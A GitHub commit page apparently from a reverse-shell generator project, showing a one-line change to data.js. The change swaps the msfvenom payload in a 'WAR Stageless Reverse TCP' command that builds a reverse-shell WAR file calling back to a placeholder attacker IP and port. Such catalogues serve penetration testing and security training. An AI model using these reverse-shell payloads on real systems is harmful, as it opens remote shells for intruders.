Merge pull request #98 from A1vinSmith/main

Update data.js
This commit is contained in:
Ryan Montgomery 2022-09-19 22:36:56 -04:00 committed by GitHub
commit 2c072ae5a1
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -420,7 +420,7 @@ const msfvenomCommands = withCommandType(
},
{
"name": "WAR Stageless Reverse TCP",
"command": "msfvenom -p java/jsp_shell_reverse_tcp LHOST={ip} LPORT={port} -f war -o shell.war",
"command": "msfvenom -p java/shell_reverse_tcp LHOST={ip} LPORT={port} -f war -o shell.war",
"meta": ["msfvenom", "windows", "linux", "stageless", "reverse"]
},
{